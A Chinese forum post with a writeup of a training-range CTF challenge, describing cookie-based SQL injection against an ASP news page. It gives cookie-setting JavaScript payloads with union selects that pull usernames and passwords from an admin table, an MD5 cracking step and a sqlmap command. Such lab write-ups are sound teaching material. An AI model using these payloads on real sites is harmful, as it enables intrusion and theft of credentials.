论坛首页 > CTF&WP专版

公开课靶场第二章writeup

wnyxy001   ·   发表于 2018-07-18 22:29:49   ·   CTF&WP专版

1. 打开新闻页面  测试是否可以SQL注入  http://120.203.13.111:8001/shownews.asp?id=171 and 1=1

发现被阻挡


2. 尝试通过cookie进行注入

新闻页面内容正常显示  到此判断存在注入点


3. 继续判断字段数为10个

执行设置cookie: javascript:alert(document.cookie="id="+escape("171 order by 10"));  

访问:http://120.203.13.111:8001/shownews.asp


4. 猜测表名admin 

执行设置cookiejavascript:alert(document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin"));   

访问:http://120.203.13.111:8001/shownews.asp



5. 猜测字段名

执行设置cookie: javascript:alert(document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); 

访问:http://120.203.13.111:8001/shownews.asp


6. 密码通过MD5加密了   解密拿到flag


上面的猜表名和字段名如果不看视频  对于我这个小白来说肯定猜不出  所以使用sqlmap又跑了一遍  拿到flag

sqlmap.py -u "http://120.203.13.111:8001/shownews.asp" --cookie "id=171"  --level 2 --tables



打赏我,让我更有动力~

1 条回复   |  直到 2018-7-26 | 1985 次浏览

wanner
发表于 2018-7-26

问一下大佬我用的是火狐,为啥我在用你的语句时没有反应(只有第一句在第一次打来这个题时有反应)

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.